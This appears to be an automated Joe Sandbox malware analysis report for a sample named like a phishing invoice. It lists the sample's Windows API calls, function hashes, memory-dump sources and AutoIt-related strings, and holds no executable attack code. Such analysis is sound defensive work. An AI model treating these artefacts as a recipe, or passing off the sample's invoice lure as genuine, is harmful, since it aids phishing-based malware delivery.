                              • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                              • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                              • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID: N@
                              • API String ID: 0-1509896676
                              • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                              • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                              • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                              • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                              • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                              • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                              • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                              • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                              • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                              • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                              • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                              • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                              • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                              • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                              • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                              • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                              APIs
                              • DeleteObject.GDI32(?), ref: 0045953B
                              • DeleteObject.GDI32(?), ref: 00459551
                              • DestroyWindow.USER32(?), ref: 00459563
                              • GetDesktopWindow.USER32 ref: 00459581
                              • GetWindowRect.USER32(00000000), ref: 00459588
                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                              • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                              • GetClientRect.USER32(00000000,?), ref: 004596F8
                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                              • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                              • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                              • GlobalLock.KERNEL32(00000000), ref: 0045978F
                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                              • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                              • CloseHandle.KERNEL32(00000000), ref: 004597AC
                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                              • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                              • GlobalFree.KERNEL32(00000000), ref: 004597E2
                              • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                              • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                              • ShowWindow.USER32(?,00000004), ref: 00459865
                              • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                              • GetStockObject.GDI32(00000011), ref: 004598CD
                              • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                              • DeleteDC.GDI32(00000000), ref: 004598F8
                              • _wcslen.LIBCMT ref: 00459916
                              • _wcscpy.LIBCMT ref: 0045993A
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                              • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                              • GetDC.USER32(00000000), ref: 004599FC
                              • SelectObject.GDI32(00000000,?), ref: 00459A0C
                              • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                              • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                              • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                              • String ID: $AutoIt v3$DISPLAY$static
                              • API String ID: 4040870279-2373415609
                              • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                              • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                              • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                              • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                              APIs
                              • GetSysColor.USER32(00000012), ref: 0044181E
                              • SetTextColor.GDI32(?,?), ref: 00441826
                              • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                              • GetSysColor.USER32(0000000F), ref: 00441849
                              • SetBkColor.GDI32(?,?), ref: 00441864
                              • SelectObject.GDI32(?,?), ref: 00441874
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                              • GetSysColor.USER32(00000010), ref: 004418B2
                              • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                              • FrameRect.USER32(?,?,00000000), ref: 004418CA
                              • DeleteObject.GDI32(?), ref: 004418D5
                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                              • FillRect.USER32(?,?,?), ref: 00441970
                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                              • String ID:
                              • API String ID: 69173610-0
                              • Opcode ID: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                              • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                              • Opcode Fuzzy Hash: 0916c3cf28f962cebf3c58740b3ff5bfe8190551d5af4ba49c76a685ec03c0b9
                              • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                              APIs
                              • DestroyWindow.USER32(?), ref: 004590F2
                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                              • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                              • GetClientRect.USER32(00000000,?), ref: 0045924E
                              • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                              • GetStockObject.GDI32(00000011), ref: 004592AC
                              • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                              • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                              • DeleteDC.GDI32(00000000), ref: 004592D6
                              • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                              • GetStockObject.GDI32(00000011), ref: 004593D3
                              • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                              • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                              • API String ID: 2910397461-517079104
                              • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                              • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                              • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                              • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: __wcsnicmp
                              • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                              • API String ID: 1038674560-3360698832
                              • Opcode ID: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                              • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                              • Opcode Fuzzy Hash: 60e7c0ccc2de36542d37a783a5f9e034653244a609c45985bfd1ff28648e5169
                              • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                              APIs
                              • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                              • SetCursor.USER32(00000000), ref: 0043075B
                              • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                              • SetCursor.USER32(00000000), ref: 00430773
                              • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                              • SetCursor.USER32(00000000), ref: 0043078B
                              • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                              • SetCursor.USER32(00000000), ref: 004307A3
                              • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                              • SetCursor.USER32(00000000), ref: 004307BB
                              • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                              • SetCursor.USER32(00000000), ref: 004307D3
                              • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                              • SetCursor.USER32(00000000), ref: 004307EB
                              • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                              • SetCursor.USER32(00000000), ref: 00430803
                              • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                              • SetCursor.USER32(00000000), ref: 0043081B
                              • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                              • SetCursor.USER32(00000000), ref: 00430833
                              • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                              • SetCursor.USER32(00000000), ref: 0043084B
                              • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                              • SetCursor.USER32(00000000), ref: 00430863
                              • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                              • SetCursor.USER32(00000000), ref: 0043087B
                              • SetCursor.USER32(00000000), ref: 00430887
                              • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                              • SetCursor.USER32(00000000), ref: 0043089F
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Cursor$Load
                              • String ID:
                              • API String ID: 1675784387-0
                              • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                              • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                              • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                              • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                              APIs
                              • GetSysColor.USER32(0000000E), ref: 00430913
                              • SetTextColor.GDI32(?,00000000), ref: 0043091B
                              • GetSysColor.USER32(00000012), ref: 00430933
                              • SetTextColor.GDI32(?,?), ref: 0043093B
                              • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                              • GetSysColor.USER32(0000000F), ref: 00430959
                              • CreateSolidBrush.GDI32(?), ref: 00430962
                              • GetSysColor.USER32(00000011), ref: 00430979
                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                              • SelectObject.GDI32(?,00000000), ref: 0043099C
                              • SetBkColor.GDI32(?,?), ref: 004309A6
                              • SelectObject.GDI32(?,?), ref: 004309B4
                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                              • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                              • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                              • DrawFocusRect.USER32(?,?), ref: 00430A91
                              • GetSysColor.USER32(00000011), ref: 00430A9F
                              • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                              • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                              • SelectObject.GDI32(?,?), ref: 00430AD0
                              • DeleteObject.GDI32(00000105), ref: 00430ADC
                              • SelectObject.GDI32(?,?), ref: 00430AE3
                              • DeleteObject.GDI32(?), ref: 00430AE9
                              • SetTextColor.GDI32(?,?), ref: 00430AF0
                              • SetBkColor.GDI32(?,?), ref: 00430AFB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                              • String ID:
                              • API String ID: 1582027408-0
                              • Opcode ID: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                              • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                              • Opcode Fuzzy Hash: 86b869e5b8bb6c2dba163effb8278b4f001f0824fd106c928e18bea154194c17
                              • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                              APIs
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                              • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
